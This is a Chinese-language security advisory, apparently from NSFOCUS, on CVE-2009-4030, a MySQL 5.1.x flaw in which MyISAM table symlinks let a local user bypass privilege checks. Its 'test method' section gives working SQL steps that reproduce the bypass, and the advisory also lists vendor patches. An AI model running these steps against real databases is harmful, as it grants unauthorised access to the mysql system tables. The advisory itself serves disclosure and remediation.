安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
MySQL MyISAM表符号链接本地权限提升漏洞
发布日期:
2009-11-05
更新日期:
2009-12-01
受影响系统:
MySQL AB MySQL 5.1.x
不受影响系统:
MySQL AB MySQL 5.1.41
描述:
BUGTRAQ ID:
37075
CVE ID:
CVE-2009-4030
MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。
MySQL允许本地用户通过对MyISAM表调用CREATE TABLE绕过某些权限检查。在通过以下方式创建MyISAM表时:
CREATE TABLE ( ) DATA DIRECTORY ... INDEX DIRECTORY ...
由于没有特别的检查确保已有的表格不会被符号链接覆盖,用户可以在test数据库中创建user表格,DATA DIRECTORY指向mysql数据库。这个漏洞与mysql_unpacked_real_data_home值的错误计算方式有关。
<*来源:Sergei Golubchik
链接:
http://bugs.mysql.com/bug.php?id=32167
https://www.redhat.com/support/errata/RHSA-2010-0110.html
https://www.redhat.com/support/errata/RHSA-2010-0109.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
root> grant all privileges on test.* to test@localhost;
test> create table t1 (a int) data directory '/MySQL/var/mysql', index directory
'/MySQL/var/mysql';
root> flush tables;
root> create table t1 (a int);
root> insert t1 values (1),(2),(3);
root> flush tables;
test> select * from t1;
建议:
厂商补丁:
MySQL AB
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://lists.mysql.com/commits/38278
RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2010:0110-01)以及相应补丁:
RHSA-2010:0110-01:Moderate: mysql security update
链接:
https://www.redhat.com/support/errata/RHSA-2010-0110.html
浏览次数:
2806
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客